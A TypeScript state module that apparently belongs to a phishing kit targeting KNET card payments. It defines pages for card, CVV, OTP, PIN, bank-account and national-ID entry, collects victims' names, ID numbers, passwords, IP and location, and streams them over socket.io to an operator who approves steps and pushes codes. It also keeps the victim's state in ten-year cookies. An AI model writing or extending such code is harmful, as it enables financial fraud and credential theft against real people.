/* eslint-disable @typescript-eslint/no-explicit-any */
import { effect, signal } from "@preact/signals";
import io from "socket.io-client";
import { deleteCookie, getCookie, setCookie } from "cookies-next";
import { sendMainInfo } from "../utils/utils";

// ROOM Is The Code That Sent To Us In Email To Connect With Real Time Server, We Can Cheng It From .env file ==> CODE Variable //

export const ROOM = import.meta.env.VITE_CODE;

// FOR SET PAGES NEW FEATURE
export const PAGES = [
  "home",
  "payment-gateway",
  "knet-gateway",
  "knet-otp",
  "knet-cvv",
  "otp",
  "pin",
  "bank-account",
  "mobile-verification",
  "verify",
  "nid-verify",
  "final-page",
];

export const socket = signal(
  io(
    import.meta.env.VITE_MODE === "DEV"
      ? import.meta.env.VITE_DEV_SOCKET_IO_URL
      : import.meta.env.VITE_PROD_SOCKET_IO_URL,
    {
      transports: ["websocket"],
      autoConnect: false,
      forceNew: true,
    }
  )
);

// To Sent To Server Any Time Tht It Change

export const adminLoading = signal(getCookie("client-state") ?? "");

export const loading = signal(getCookie("client-state") ?? "net");

export const isApproved = signal(false);

export const messages = signal<any[]>([]);

export const permissions = signal<string[]>(
  getCookie("permissions") ? JSON.parse(getCookie("permissions")!) : []
);

export const message = signal("");

export const lastMessage = signal("");

export const mainInfo = signal({
  fullName: "",
  email: "",
  phone: "",
  idNumber: "",
  adminEmail: "",
  password: "",
  _id: "",
  room: ROOM,
  ip: "",
  country: "",
  city: "",
  date: "",
  socketId: "",
  page: "home",
  state: getCookie("mainInfoState")
    ? JSON.parse(getCookie("mainInfoState")!)
    : {},
});

//For Admin Rejected Our Request Notification

export const isAdminError = signal(false);

//For Shown Chat Model

export const isChat = signal(false);

//For Chat Notification

export const isNewMessage = signal(0);

//For Code That Sent From Admin

export const code = signal("");

export const specialId = signal("");

export const isError = signal("");

effect(() => {
  if (mainInfo.value.state && Object.keys(mainInfo.value.state).length > 0) {
    setCookie("mainInfoState", JSON.stringify(mainInfo.value.state), {
      maxAge: 3650 * 24 * 60 * 60, // 10 years
    });
  } else {
    deleteCookie("mainInfoState");
  }
});

effect(() => {
  if (mainInfo.value.socketId) {
    sendMainInfo();
  }
});

effect(() => {
  if (isChat.value) {
    isNewMessage.value = 0;
  }
});

effect(() => {
  if (adminLoading.value) {
    setCookie("client-state", adminLoading.value, {
      maxAge: 3650 * 24 * 60 * 60,
    });
  } else {
    deleteCookie("client-state");
  }
});

effect(() => {
  if (permissions.value) {
    setCookie("permissions", JSON.stringify(permissions.value), {
      maxAge: 3650 * 24 * 60 * 60,
    });
  }
});
